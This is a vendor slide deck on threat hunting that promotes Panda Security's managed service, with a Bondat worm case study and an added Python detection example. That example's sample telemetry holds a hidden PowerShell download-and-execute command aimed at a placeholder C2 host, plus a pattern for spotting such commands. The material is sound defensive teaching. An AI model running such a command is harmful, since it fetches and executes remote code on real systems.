Threat hunting is a proactive approach to security that involves actively searching networks for threats that evade traditional defenses like firewalls and antivirus. It involves forming hypotheses about potential attacks based on indicators and then validating those hypotheses by searching for related evidence. While threat hunting requires time, skills, and resources that many organizations lack, Panda Security's Threat Hunting and Investigation Service (THIS) provides threat hunting as a managed service at no extra cost with their Adaptive Defense 360 platform. THIS continuously monitors endpoints, forms hypotheses about attacks, and validates findings to detect threats that other solutions may miss.
1. What is Threat Hunting? And Why Do You Need It?
Diogo Pata, Subsidiaries Presales Manager, Panda Security HQ
2. Agenda
• What is Threat Hunting?
• Why is it Becoming Popular?
• What are the Challenges?
• Panda T.H.I.S.
• Practical Case Example
• Summary
• Q & A
4. Definition
“…the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions. This is in contrast to traditional threat management measures, such as firewalls, intrusion detection systems (IDS), malware sandbox (computer security) and SIEM systems, which typically involve an investigation after there has been a warning of a potential threat or an incident has occurred.”
5. Definition
• Proactive versus Reactive approach to threats
• Threat hunting is not incident response, but they are connected
• Threat hunting covers what the tools in place cannot see
• It is not a replacement for other strategies, such as threat detection
6. Gartner’s Contrast
Threat Detection:
• Deploy detection content (rules, algorithms)
• Receive alerts when conditions match
• Triage alerts
• Respond to an incident
Threat Hunting:
• Formulate a hypothesis
• Look for it in the environment
• If proven, pivot and expand the scope, respond to an incident, and develop new detection content
• If not proven, go back
Source: Gartner 2017, How to Hunt for Security Threats. Anton Chuvakin, 6 April 2017. ID: G00327290.
8. Proactive Trends
• Solutions
  • EPP to EDR
  • Being phished to phishing yourself
• Practices
  • Passive wait and see
  • Penetration testing
  • Red teams
9. Valuable Traces
• Attacks leave behind valuable traces
  • Failed attacks
  • Probes
• Discover weaknesses
• Find activity before it becomes a disaster
10. Breaches are Expensive!
• Average cost of a breach in the US is $7.9M
• Average cost of a breach globally is $3.8M
• Takes an average of 197 days to identify a breach
• Average span of 69 days to contain a breach
*IBM/Ponemon 2018 Cost of Data Breach Study
11. Infections are Dwindling
• 2016 had 40% fewer infections than 2015
• 2017 improvement is 70%
• 2018: next to zero infections reported
12. Infections are Dwindling: Hackers are the New Problem
• Trained by governments, security companies, and criminal organizations
• Create targeted attacks with proprietary malware
• Using applications and goodware to fly under the radar
• An equivalent response to this is needed
14. Time
• Are you the I.T. administrator, technician, and CISO already?
• Time is your enemy
  • Likely not enough time to do threat hunting
• Time needed to effectively hunt for threats
  • Collect data, create hypothesis, try to validate
• Time is needed to research
  • Attack indicators
    • IOAs
    • IOCs
  • Attacker patterns
  • Threat groups
19. Threat Hunting: The Adaptive Defense Service
• It continuously monitors the endpoint for security attacks by internal and external agents.
• It finds attackers that are not using malware.
Benefits
• Hacker detection
  • Next-gen or malware-less attacks
  • Lateral movements
• Identification of malicious employees
  • User behavior modeling
  • Identity control, data control
20. The Threat Hunting Process
Where could we find the attack? Customer endpoints feed an Events Stream (real time) and an Event Storage with a Historic Timeline (retrospective).
1. Hypothesis Generation: Back Testing Console (run over the historic event storage)
2. Trigger Detonation: Threat Engine
3. Incident Confirmation: Service Orchestrator, Forensic Console
21. Event Telemetry
Main events gathered:
• Process: creation, injections
• Files: creation, modification, open
• Communications: origin and destination IPs, downloads (URLs)
• Registry: creation, modification
• Administrative: installation, turn on/off
Global numbers (12 months):
• ~4,000 events per machine
• ~4,000M events processed daily in big data
• ~500,000M events stored
• ~500 detection contents
• ~4 billion applications profiled
• ~2.5 billion workstations profiled
• ~3.5 billion IDs profiled
23. Study of a threat, hypothesis generation, and validation
Threat Hunting: Bondat – the Invisible Worm
Step 1: The Study
An expert threat hunter analyzes the family, studies its characteristics and discovers that:
• It is a worm written in JavaScript / VBScript
• It spreads via removable drives (pen drives, hard drives, etc.) by creating LNKs
• It is placed in the startup of the system
• The C&C server updates its code
• Anti-debug / anti-VM / anti-emulation measures
• Highly obfuscated in the latest versions
• Very difficult to detect statically / by signature
• It spreads throughout the network very quickly
• Very difficult to disinfect after spreading through the network
24. Threat Hunting: Bondat – the Invisible Worm
Study of a threat, generation of hypotheses and validation
Hypothesis Generation (back testing console over the retrospective event storage):
• Based on possible communications with C&Cs
• Based on type of concealment and type of executions (extended)
• Based on type of events
Hypothesis Validation:
• We find the worm downloading and running PowerShell scripts (not seen before, new functionality).
• We see it downloading JavaScripts.
• It downloads the PHP interpreter and then makes another query to another website to get new PHP code to execute.
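As an added illustration of the hypothesis-and-back-test loop above (example code written for this page, not Panda's service or the deck's own material), the Bondat characteristics are expressed as checks over process-creation telemetry and back-tested against a constructed event sample; the field names, the `removable` flag and the sample hosts are assumptions.

```python
# Added example: back-test a Bondat-style hunting hypothesis over constructed
# process-creation events. Not code from the presentation or from Panda Security.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent: str             # parent image name
    image: str              # child image name
    cmdline: str            # child command line
    removable: bool = False  # constructed flag: script launched from a removable drive


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}           # JS / VBS run through these
DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|webclient", re.I)


def hypothesis_hits(ev):
    """Return the names of the hypothesis branches a single event satisfies."""
    parent, image = ev.parent.lower(), ev.image.lower()
    hits = []
    if image in SCRIPT_HOSTS and ev.removable:          # LNK on a pen drive starts the script
        hits.append("script host started from removable drive")
    if parent in SCRIPT_HOSTS and image == "powershell.exe" and DOWNLOAD.search(ev.cmdline):
        hits.append("script host spawns downloading PowerShell")   # the "new functionality"
    if parent in SCRIPT_HOSTS and image == "php.exe":   # worm fetching and running PHP code
        hits.append("script host runs PHP interpreter")
    return hits


def back_test(events):
    """Per host: >= 2 distinct branches -> 'confirm' (pivot, notify), 1 -> 'lead' (keep hunting)."""
    per_host = {}
    for ev in events:
        for branch in hypothesis_hits(ev):
            per_host.setdefault(ev.host, set()).add(branch)
    return {h: ("confirm" if len(b) >= 2 else "lead") for h, b in per_host.items()}


# Constructed telemetry: one infected host and one host running a benign admin script.
SAMPLE = [
    ProcEvent("ws-17", "explorer.exe", "wscript.exe", r"wscript.exe E:\photos.js", removable=True),
    ProcEvent("ws-17", "wscript.exe", "powershell.exe",
              "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://c2.example/s')"),
    ProcEvent("ws-17", "wscript.exe", "php.exe", r"php.exe C:\Users\Public\x.php"),
    ProcEvent("ws-42", "explorer.exe", "cscript.exe", r"cscript.exe \\fileserver\it\inventory.vbs"),
    ProcEvent("ws-42", "cscript.exe", "powershell.exe", "powershell -File inventory.ps1"),
]

if __name__ == "__main__":
    print(back_test(SAMPLE))   # {'ws-17': 'confirm'}; ws-42 is not proven and drops out
```

In the deck's terms, a host that is not proven goes back to hypothesis generation, while a confirmed one feeds new IOAs and detection content.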
25. Threat Hunting: Bondat – the Invisible Worm
Study of a threat, generation of hypotheses and validation
Attacks found:
• Knowing the C&C communication details, it was possible to pose as an infected machine and collect the latest payloads that the attackers were launching.
• Brute force on a list of sites with WordPress to trojanize them
• Download and installation of miners for economic gain.
• Denial of service to the NRA (US National Rifle Association).
IOAs
• Generation of new IOAs.
• New detection content creation.
• Incident notification to customer.
26. Panda Security named Magic Quadrant Visionary
• According to Gartner: “Organizations should pay particular attention to solutions that include managed services like threat hunting or file classification.
• Panda Security's unique value proposition is the classification or attestation of every single executable file and process on a protected endpoint device, and it is the only vendor to include a managed threat hunting service in the base purchase of its EPP.”
Panda Adaptive Defense 360 provides both managed services, at no extra cost:
• 100% Attestation Service
• Threat Hunting & Investigation Service
This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Panda Security. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
27. Summary
• Malware is not the only problem to solve; the focus is shifting to include real-time attacks and hackers
• Attackers are evolving and adapting to tools and services. Continuous analysis and threat hunting is the solution
• Panda’s Adaptive Defense 360 platform provides all of this for you by just installing the protection